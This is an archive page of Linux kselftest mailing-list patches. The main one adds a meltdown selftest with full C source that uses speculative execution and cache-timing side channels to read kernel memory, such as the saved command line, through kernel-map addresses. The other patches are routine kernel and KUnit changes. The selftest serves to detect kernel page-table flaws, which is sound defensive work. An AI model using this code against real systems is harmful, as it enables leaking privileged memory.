return 0; +} -- 2.39.0

2 years, 5 months

1
0
0 0

[PATCH] selftest/x86/meltdown: Add a selftest for meltdown

by Aaron Lu

To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added. This selftest is based on Pavel Boldin's work at: https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test(reading saved_command_line) to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test(read local var), only low kernel mapping leak is enough to trigger a test fail, so both tests are useful. Test results of 10 runs: On v6.1-rc8 with nopti kernel cmdline option: host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests. bdw=broadwell, hsw=haswell, ivb=ivybridge, etc. test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space. On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2. Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8. Main changes I made from Pavel Boldin's meltdown test are: - Replace rdtscll() and clflush() with kernel's implementation; - Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions; - Coding style changes: placing the function return type in the same line of the function. Signed-off-by: Aaron Lu <aaron.lu(a)intel.com> --- Notable changes from RFC v3: - Drop RFC tag; - Change the base code from zlib licensed one to GPL licensed one. tools/testing/selftests/x86/Makefile | 2 +- tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++ 2 files changed, 530 insertions(+), 1 deletion(-) create mode 100644 tools/testing/selftests/x86/meltdown.c diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \ - syscall_arg_fault fsgsbase_restore sigaltstack + syscall_arg_fault fsgsbase_restore sigaltstack meltdown TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..fcb211dc9038 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,529 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (c) 2018 Pavel Boldin <pboldin(a)cloudlinux.com> + * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… + */ + +#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdarg.h> +#include <string.h> +#include <signal.h> +#include <ucontext.h> +#include <unistd.h> +#include <fcntl.h> +#include <ctype.h> +#include <sys/utsname.h> +#include <sys/mman.h> + +#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1)) + +size_t cache_miss_threshold; +unsigned long directmap_base; + +#define TARGET_OFFSET 9 +#define TARGET_SIZE (1 << TARGET_OFFSET) +#define BITS_BY_READ 2 + +static inline uint64_t rdtsc(void) +{ + uint32_t eax, edx; + uint64_t tsc_val; + /* + * The lfence is to wait (on Intel CPUs) until all previous + * instructions have been executed. If software requires RDTSC to be + * executed prior to execution of any subsequent instruction, it can + * execute LFENCE immediately after RDTSC + * */ + __asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx)); + tsc_val = ((uint64_t)edx) << 32 | eax; + return tsc_val; +} + +static inline void clflush(volatile void *__p) +{ + asm volatile("clflush %0" : "+m" (*(volatile char *)__p)); +} + +static char target_array[BITS_BY_READ * TARGET_SIZE]; + +static void clflush_target(void) +{ + int i; + + for (i = 0; i < BITS_BY_READ; i++) + clflush(&target_array[i * TARGET_SIZE]); +} + +extern char failshere[]; +extern char stopspeculate[]; + +static void __attribute__((noinline)) speculate(unsigned long addr, char bit) +{ + register char mybit asm ("cl") = bit; +#ifdef __x86_64__ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%rax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%rax\n\t" + "and $1, %%rax\n\t" + "shl $9, %%rax\n\t" + "jz 1b\n\t" + + "movq (%[target], %%rax, 1), %%rbx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "rbx" + ); +#else /* defined(__x86_64__) */ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%eax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%eax\n\t" + "and $1, %%eax\n\t" + "shl $9, %%eax\n\t" + "jz 1b\n\t" + + "movl (%[target], %%eax, 1), %%ebx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "ebx" + ); +#endif +} + +#ifdef __i386__ +# define REG_RIP REG_EIP +#endif + +static void sigsegv(int sig, siginfo_t *siginfo, void *context) +{ + ucontext_t *ucontext = context; + unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP]; + if (*prip != (unsigned long)failshere) { + printf("Segmentation fault at unexpected location %lx\n", *prip); + abort(); + } + *prip = (unsigned long)stopspeculate; + return; +} + +static int set_signal(void) +{ + struct sigaction act = { + .sa_sigaction = sigsegv, + .sa_flags = SA_SIGINFO, + }; + + return sigaction(SIGSEGV, &act, NULL); +} + +static inline int get_access_time(volatile char *addr) +{ + unsigned long long time1, time2; + volatile int j __attribute__((__unused__)); + + time1 = rdtsc(); + j = *addr; + time2 = rdtsc(); + + return time2 - time1; +} + +static int cache_hit_threshold; +static int hist[BITS_BY_READ]; + +static void check(void) +{ + int i, time; + volatile char *addr; + + for (i = 0; i < BITS_BY_READ; i++) { + addr = &target_array[i * TARGET_SIZE]; + + time = get_access_time(addr); + + if (time <= cache_hit_threshold) + hist[i]++; + } +} + +#define CYCLES 10000 +static int readbit(int fd, unsigned long addr, char bit) +{ + int i, ret; + static char buf[256]; + + memset(hist, 0, sizeof(hist)); + + for (i = 0; i < CYCLES; i++) { + /* + * Make the to-be-stolen data cache and tlb hot + * to increase success rate. + */ + ret = pread(fd, buf, sizeof(buf), 0); + if (ret < 0) + printf("[INFO]\tCan't read fd"); + + clflush_target(); + + speculate(addr, bit); + check(); + } + + if (hist[1] > CYCLES / 10) + return 1; + return 0; +} + +static int readbyte(int fd, unsigned long addr) +{ + int bit, res = 0; + + for (bit = 0; bit < 8; bit ++ ) + res |= (readbit(fd, addr, bit) << bit); + + return res; +} + +static int mysqrt(long val) +{ + int root = val / 2, prevroot = 0, i = 0; + + while (prevroot != root && i++ < 100) { + prevroot = root; + root = (val / root + root) / 2; + } + + return root; +} + +#define ESTIMATE_CYCLES 1000000 +static void set_cache_hit_threshold(void) +{ + long cached, uncached, i; + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) { + clflush(target_array); + uncached += get_access_time(target_array); + } + + cached /= ESTIMATE_CYCLES; + uncached /= ESTIMATE_CYCLES; + + cache_hit_threshold = mysqrt(cached * uncached); + + printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n", + cached, uncached, cache_hit_threshold); +} + +static unsigned long find_symbol_in_file(const char *filename, const char *symname) +{ + unsigned long addr; + char type, *buf; + int found; + FILE *fp; + + fp = fopen(filename, "r"); + if (!fp) { + printf("[INFO]\tFailed to open %s\n", filename); + return 0; + } + + buf = malloc(4096); + if (!buf) + return 0; + + found = 0; + while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) { + if (!strcmp(buf, symname)) { + found = 1; + break; + } + } + + free(buf); + fclose(fp); + + return found ? addr : 0; +} + +static unsigned long find_kernel_symbol(const char *name) +{ + char systemmap[256]; + struct utsname utsname; + unsigned long addr; + + addr = find_symbol_in_file("/proc/kallsyms", name); + if (addr) + return addr; + + if (uname(&utsname) < 0) + return 0; + sprintf(systemmap, "/boot/System.map-%s", utsname.release); + addr = find_symbol_in_file(systemmap, name); + return addr; +} + +static unsigned long saved_cmdline_addr; +static int spec_fd; + +#define READ_SIZE 32 + +static int test_read_saved_command_line(void) +{ + unsigned int i, score = 0, ret; + unsigned long addr; + unsigned long size; + char read[READ_SIZE] = { 0 }; + char expected[READ_SIZE] = { 0 }; + int expected_len; + + saved_cmdline_addr = find_kernel_symbol("saved_command_line"); + if (!saved_cmdline_addr) { + printf("[SKIP]\tCan not find symbol saved_command_line\n"); + return 0; + } + printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr); + + spec_fd = open("/proc/cmdline", O_RDONLY); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open /proc/cmdline\n"); + return 0; + } + + expected_len = pread(spec_fd, expected, sizeof(expected), 0); + if (expected_len < 0) { + printf("[SKIP]\tCan't read /proc/cmdline\n"); + return 0; + } + + /* read address of saved_cmdline_addr */ + addr = saved_cmdline_addr; + size = sizeof(addr); + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + /* read value pointed to by saved_cmdline_addr */ + memcpy(&addr, read, sizeof(addr)); + memset(read, 0, sizeof(read)); + printf("[INFO]\tsaved_command_line: 0x%lx\n", addr); + size = expected_len; + + if (!addr) + goto done; + + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + for (i = 0; i < size; i++) + if (expected[i] == read[i]) + score++; + +done: + if (score > size / 2) { + printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n"); + ret = -1; + } else { + printf("[OK]\ttest_read_saved_command_line: no leak found.\n"); + ret = 0; + } + + close(spec_fd); + + return ret; +} + +static int get_directmap_base(void) +{ + char *buf; + FILE *fp; + size_t n; + int ret; + + fp = fopen("/sys/kernel/debug/page_tables/kernel", "r"); + if (!fp) + return -1; + + buf = NULL; + ret = -1; + while (getline(&buf, &n, fp) != -1) { + if (!strstr(buf, "Kernel Mapping")) + continue; + + if (getline(&buf, &n, fp) != -1 && + sscanf(buf, "0x%lx", &directmap_base) == 1) { + printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK); + directmap_base &= PUD_MASK; + ret = 0; + break; + } + } + + fclose(fp); + free(buf); + return ret; +} + +static int virt_to_phys(unsigned long virt, unsigned long *phys) +{ + unsigned long pfn; + uint64_t val; + int fd, ret; + + fd = open("/proc/self/pagemap", O_RDONLY); + if (fd == -1) { + printf("[INFO]\tFailed to open pagemap\n"); + return -1; + } + + ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t)); + if (ret == -1) { + printf("[INFO]\tFailed to read pagemap\n"); + goto out; + } + + if (!(val & (1ULL << 63))) { + printf("[INFO]\tPage not present according to pagemap\n"); + ret = -1; + goto out; + } + + pfn = val & ((1ULL << 55) - 1); + if (pfn == 0) { + printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n"); + ret = -1; + goto out; + } + + ret = 0; + *phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1)); + +out: + close(fd); + return ret; +} + +static int test_read_local_var(void) +{ + char path[] = "/tmp/meltdown.XXXXXX"; + char string[] = "test string"; + unsigned long phys; + int i, len, ret; + char *result; + void *p; + + if (get_directmap_base() == -1) { + printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n"); + return 0; + } + + spec_fd = mkstemp(path); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open %s\n", path); + return 0; + } + ftruncate(spec_fd, 0x1000); + + p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0); + if (p == MAP_FAILED) { + printf("[SKIP]\tmmap spec_fd failed\n"); + return 0; + } + memcpy(p, string, sizeof(string)); + + if (virt_to_phys((unsigned long)p, &phys) == -1) { + printf("[SKIP]\tCan not convert virtual address to physical address\n"); + return 0; + } + + len = strlen(string); + result = malloc(len + 1); + if (!result) { + printf("[SKIP]\tNot enough memory for malloc\n"); + return 0; + } + memset(result, 0, len + 1); + + for (i = 0; i < len; i++, phys++) { + result[i] = readbyte(spec_fd, directmap_base + phys); + if (result[i] == 0) + break; + } + + ret = !strncmp(string, result, len); + if (ret) + printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n"); + else + printf("[OK]\ttest_read_local_var: no leak found.\n"); + + free(result); + munmap(p, 0x1000); + close(spec_fd); + + return ret; +} + +int main(void) +{ + int ret1, ret2; + + printf("[RUN]\tTest if system is vulnerable to meltdown\n"); + + set_cache_hit_threshold(); + + memset(target_array, 1, sizeof(target_array)); + + if (set_signal() < 0) { + printf("[SKIP]\tCan not set handler for segfault\n"); + return 0; + } + + ret1 = test_read_local_var(); + ret2 = test_read_saved_command_line(); + + if (ret1 || ret2) + return -1; + + return 0; +} -- 2.39.0

2 years, 5 months

6
15
0 0

[PATCH linux-next] KVM: x86/xen: Remove unneeded semicolon

by zhang.songyi＠zte.com.cn

From: zhang songyi <zhang.songyi(a)zte.com.cn> The semicolon after the "}" is unneeded. Signed-off-by: zhang songyi <zhang.songyi(a)zte.com.cn> --- tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c b/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c index 721f6a693799..3e6ac82eba15 100644 --- a/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c +++ b/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c @@ -426,7 +426,7 @@ static void *juggle_shinfo_state(void *arg) __vm_ioctl(vm, KVM_XEN_HVM_SET_ATTR, &cache_init); __vm_ioctl(vm, KVM_XEN_HVM_SET_ATTR, &cache_destroy); pthread_testcancel(); - }; + } return NULL; } -- 2.15.2

2 years, 5 months

2
1
0 0

[V5 PATCH 0/3] Execute hypercalls according to host cpu

by Vishal Annapurve

Confidential VMs(CVMs) need to execute hypercall instruction as per the CPU type. Normally KVM emulates the vmcall/vmmcall instruction by patching the guest code at runtime. Such a guest memory manipulation by KVM is not allowed with CVMs and is also undesirable in general. This series adds support of executing hypercall as per the host cpu vendor. CPU vendor is queried early during selftest setup and guest setup to be reused later. Changes in v5: 1) Incorporated suggestions from Sean - * Rename the APIs to have "this_cpu*" prefix to better convey the intent of callers to query cpu vendor of the current cpu * Squash patches together to cache, share cpu vendor type and replace current callers of "this_cpu*" with checking the saved host cpu vendor in a single patch. Changes in v4: 1) Incoporated suggestions from Sean - * Added APIs to query host cpu type * Shared the host cpu type with guests to avoid querying the cpu type again * Modified kvm_hypercall to execute vmcall/vmmcall according to host cpu type. 2) Dropped the separate API for kvm_hypercall. v4: https://lore.kernel.org/lkml/20221228192438.2835203-1-vannapurve@google.com/ Vishal Annapurve (3): KVM: selftests: x86: Use "this_cpu" prefix for cpu vendor queries KVM: selftests: x86: Cache host CPU vendor (AMD vs. Intel) KVM: selftests: x86: Use host's native hypercall instruction in kvm_hypercall() .../selftests/kvm/include/x86_64/processor.h | 28 +++++++++-- .../selftests/kvm/lib/x86_64/processor.c | 46 ++++++++----------- .../selftests/kvm/x86_64/fix_hypercall_test.c | 4 +- .../selftests/kvm/x86_64/mmio_warning_test.c | 2 +- .../kvm/x86_64/pmu_event_filter_test.c | 4 +- .../vmx_exception_with_invalid_guest_state.c | 2 +- 6 files changed, 51 insertions(+), 35 deletions(-) -- 2.39.0.314.g84b9a713c41-goog

2 years, 5 months

2
4
0 0

[RFC PATCH] kunit: Add "hooks" to call into KUnit when it's built as a module

by David Gow

KUnit has several macros and functions intended for use from non-test code. These hooks, currently the kunit_get_current_test() and kunit_fail_current_test() macros, didn't work when CONFIG_KUNIT=m. In order to support this case, the required functions and static data need to be available unconditionally, even when KUnit itself is not built-in. The new 'hooks.c' file is therefore always included, and has both the static key required for kunit_get_current_test(), and a function pointer to the real implementation of __kunit_fail_current_test(), which is populated when the KUnit module is loaded. This can then be extended for future features which require similar "hook" behaviour, such as static stubs: https://lore.kernel.org/all/20221208061841.2186447-1-davidgow@google.com/ Signed-off-by: David Gow <davidgow(a)google.com> --- This is basically a prerequisite for the stub features working when KUnit is built as a module, and should nicely make a few other tests work then, too. I'm not 100% sold on the whole "fill in a table of function pointers when kunit.ko is loaded" trick: it is basically just working around the sensible limitations on depending on modules. I think it should be safe here, as the functions/macros all have fallback behaviour when no test is running, and this is just another case of that. Similarly, I'm sure there must be a better way to compile hooks.o in when KUNIT=y or KUNIT=m, but the trick of adding it separately as an obj-y in the lib/ Makefile, then having an #if IS_ENABLED() check in the file is the only one I've been able to come up with using my meagre knowledge of Kbuild. Better suggestions welcome! --- Documentation/dev-tools/kunit/usage.rst | 14 ++++++-------- include/kunit/test-bug.h | 15 ++++++++------- lib/Makefile | 4 ++++ lib/kunit/Makefile | 3 +++ lib/kunit/hooks.c | 23 +++++++++++++++++++++++ lib/kunit/test.c | 10 ++++------ 6 files changed, 48 insertions(+), 21 deletions(-) create mode 100644 lib/kunit/hooks.c diff --git a/Documentation/dev-tools/kunit/usage.rst b/Documentation/dev-tools/kunit/usage.rst index 48f8196d5aad..6424493b93cb 100644 --- a/Documentation/dev-tools/kunit/usage.rst +++ b/Documentation/dev-tools/kunit/usage.rst @@ -648,10 +648,9 @@ We can do this via the ``kunit_test`` field in ``task_struct``, which we can access using the ``kunit_get_current_test()`` function in ``kunit/test-bug.h``. ``kunit_get_current_test()`` is safe to call even if KUnit is not enabled. If -KUnit is not enabled, was built as a module (``CONFIG_KUNIT=m``), or no test is -running in the current task, it will return ``NULL``. This compiles down to -either a no-op or a static key check, so will have a negligible performance -impact when no test is running. +KUnit is not enabled, or if no test is running in the current task, it will +return ``NULL``. This compiles down to either a no-op or a static key check, +so will have a negligible performance impact when no test is running. The example below uses this to implement a "mock" implementation of a function, ``foo``: @@ -726,8 +725,7 @@ structures as shown below: #endif ``kunit_fail_current_test()`` is safe to call even if KUnit is not enabled. If -KUnit is not enabled, was built as a module (``CONFIG_KUNIT=m``), or no test is -running in the current task, it will do nothing. This compiles down to either a -no-op or a static key check, so will have a negligible performance impact when -no test is running. +KUnit is not enabled, or if no test is running in the current task, it will do +nothing. This compiles down to either a no-op or a static key check, so will +have a negligible performance impact when no test is running. diff --git a/include/kunit/test-bug.h b/include/kunit/test-bug.h index c1b2e14eab64..122f50198903 100644 --- a/include/kunit/test-bug.h +++ b/include/kunit/test-bug.h @@ -1,6 +1,6 @@ /* SPDX-License-Identifier: GPL-2.0 */ /* - * KUnit API allowing dynamic analysis tools to interact with KUnit tests + * KUnit API providing hooks for non-test code to interact with tests. * * Copyright (C) 2020, Google LLC. * Author: Uriel Guajardo <urielguajardo(a)google.com> @@ -9,7 +9,7 @@ #ifndef _KUNIT_TEST_BUG_H #define _KUNIT_TEST_BUG_H -#if IS_BUILTIN(CONFIG_KUNIT) +#if IS_ENABLED(CONFIG_KUNIT) #include <linux/jump_label.h> /* For static branch */ #include <linux/sched.h> @@ -43,20 +43,21 @@ static inline struct kunit *kunit_get_current_test(void) * kunit_fail_current_test() - If a KUnit test is running, fail it. * * If a KUnit test is running in the current task, mark that test as failed. - * - * This macro will only work if KUnit is built-in (though the tests - * themselves can be modules). Otherwise, it compiles down to nothing. */ #define kunit_fail_current_test(fmt, ...) do { \ if (static_branch_unlikely(&kunit_running)) { \ + /* Guaranteed to be non-NULL when kunit_running true*/ \ __kunit_fail_current_test(__FILE__, __LINE__, \ fmt, ##__VA_ARGS__); \ } \ } while (0) -extern __printf(3, 4) void __kunit_fail_current_test(const char *file, int line, - const char *fmt, ...); +/* Function pointer defined as a hook in hooks.c, and implemented in test.c */ +typedef __printf(3, 4) void kunit_hook_fn_fail_current_test(const char *file, + int line, + const char *fmt, ...); +extern kunit_hook_fn_fail_current_test *__kunit_fail_current_test; #else diff --git a/lib/Makefile b/lib/Makefile index 4d9461bfea42..9031de6ca73c 100644 --- a/lib/Makefile +++ b/lib/Makefile @@ -126,6 +126,10 @@ CFLAGS_test_fpu.o += $(FPU_CFLAGS) obj-$(CONFIG_TEST_LIVEPATCH) += livepatch/ obj-$(CONFIG_KUNIT) += kunit/ +# Include the KUnit hooks unconditionally. They'll compile to nothing if +# CONFIG_KUNIT=n, otherwise will be a small table of static data (static key, +# function pointers) which need to be built-in even when KUnit is a module. +obj-y += kunit/hooks.o ifeq ($(CONFIG_DEBUG_KOBJECT),y) CFLAGS_kobject.o += -DDEBUG diff --git a/lib/kunit/Makefile b/lib/kunit/Makefile index 29aff6562b42..deeb46cc879b 100644 --- a/lib/kunit/Makefile +++ b/lib/kunit/Makefile @@ -11,6 +11,9 @@ ifeq ($(CONFIG_KUNIT_DEBUGFS),y) kunit-objs += debugfs.o endif +# KUnit 'hooks' are built-in even when KUnit is built as a module. +lib-y += hooks.o + obj-$(CONFIG_KUNIT_TEST) += kunit-test.o # string-stream-test compiles built-in only. diff --git a/lib/kunit/hooks.c b/lib/kunit/hooks.c new file mode 100644 index 000000000000..48189567a774 --- /dev/null +++ b/lib/kunit/hooks.c @@ -0,0 +1,23 @@ +// SPDX-License-Identifier: GPL-2.0 +/* + * KUnit 'Hooks' implementation. + * + * This file contains code / structures which should be built-in even when + * KUnit itself is built as a module. + * + * Copyright (C) 2022, Google LLC. + * Author: David Gow <davidgow(a)google.com> + */ + +/* This file is always built-in, so make sure it's empty if CONFIG_KUNIT=n */ +#if IS_ENABLED(CONFIG_KUNIT) + +#include <kunit/test-bug.h> + +DEFINE_STATIC_KEY_FALSE(kunit_running); +EXPORT_SYMBOL(kunit_running); + +/* Function pointers for hooks. */ +kunit_hook_fn_fail_current_test *__kunit_fail_current_test; +EXPORT_SYMBOL_GPL(__kunit_fail_current_test); +#endif diff --git a/lib/kunit/test.c b/lib/kunit/test.c index c9ebf975e56b..711fdcce6de8 100644 --- a/lib/kunit/test.c +++ b/lib/kunit/test.c @@ -20,13 +20,10 @@ #include "string-stream.h" #include "try-catch-impl.h" -DEFINE_STATIC_KEY_FALSE(kunit_running); - -#if IS_BUILTIN(CONFIG_KUNIT) /* * Fail the current test and print an error message to the log. */ -void __kunit_fail_current_test(const char *file, int line, const char *fmt, ...) +void __kunit_fail_current_test_impl(const char *file, int line, const char *fmt, ...) { va_list args; int len; @@ -53,8 +50,6 @@ void __kunit_fail_current_test(const char *file, int line, const char *fmt, ...) kunit_err(current->kunit_test, "%s:%d: %s", file, line, buffer); kunit_kfree(current->kunit_test, buffer); } -EXPORT_SYMBOL_GPL(__kunit_fail_current_test); -#endif /* * Enable KUnit tests to run. @@ -777,6 +772,9 @@ EXPORT_SYMBOL_GPL(kunit_cleanup); static int __init kunit_init(void) { + /* Install the KUnit hook functions. */ + __kunit_fail_current_test = __kunit_fail_current_test_impl; + kunit_debugfs_init(); #ifdef CONFIG_MODULES return register_module_notifier(&kunit_mod_nb); -- 2.39.0.314.g84b9a713c41-goog

2 years, 5 months

2
1
0 0

[PATCH HID for-next v2 0/9] HID-BPF LLVM fixes, no more hacks

by Benjamin Tissoires

Hi, So this is the fix for the bug that actually prevented me to integrate HID-BPF in v6.2. While testing the code base with LLVM, I realized that clang was smarter than I expected it to be, and it sometimes inlined a function or not depending on the branch. This lead to segfaults because my current code in linux-next is messing up the bpf programs refcounts assuming that I had enough observability over the kernel. So I came back to the drawing board and realized that what I was missing was exactly a bpf_link, to represent the attachment of a bpf program to a HID device. This is the bulk of the series, in patch 6/9. The other patches are cleanups, tests, and also the addition of the vmtests.sh script I run locally, largely inspired by the one in the bpf selftests dir. This allows very fast development of HID-BPF, assuming we have tests that cover the bugs :) changes in v2: - took Alexei's remarks into account and renamed the indexes into prog_table_index and hid_table_index - fixed unused function as reported by the Intel kbuild bot Cheers, Benjamin Benjamin Tissoires (9): selftests: hid: add vmtest.sh selftests: hid: allow to compile hid_bpf with LLVM selftests: hid: attach/detach 2 bpf programs, not just one selftests: hid: ensure the program is correctly pinned selftests: hid: prepare tests for HID_BPF API change HID: bpf: rework how programs are attached and stored in the kernel selftests: hid: enforce new attach API HID: bpf: clean up entrypoint HID: bpf: reorder BPF registration Documentation/hid/hid-bpf.rst | 12 +- drivers/hid/bpf/entrypoints/entrypoints.bpf.c | 9 - .../hid/bpf/entrypoints/entrypoints.lskel.h | 188 ++++-------- drivers/hid/bpf/hid_bpf_dispatch.c | 28 +- drivers/hid/bpf/hid_bpf_dispatch.h | 3 - drivers/hid/bpf/hid_bpf_jmp_table.c | 129 ++++---- include/linux/hid_bpf.h | 7 + tools/testing/selftests/hid/.gitignore | 1 + tools/testing/selftests/hid/Makefile | 10 +- tools/testing/selftests/hid/config.common | 241 +++++++++++++++ tools/testing/selftests/hid/config.x86_64 | 4 + tools/testing/selftests/hid/hid_bpf.c | 32 +- tools/testing/selftests/hid/progs/hid.c | 13 + tools/testing/selftests/hid/vmtest.sh | 284 ++++++++++++++++++ 14 files changed, 728 insertions(+), 233 deletions(-) create mode 100644 tools/testing/selftests/hid/config.common create mode 100644 tools/testing/selftests/hid/config.x86_64 create mode 100755 tools/testing/selftests/hid/vmtest.sh -- 2.38.1

2 years, 5 months

3
13
0 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

Linux-kselftest-mirror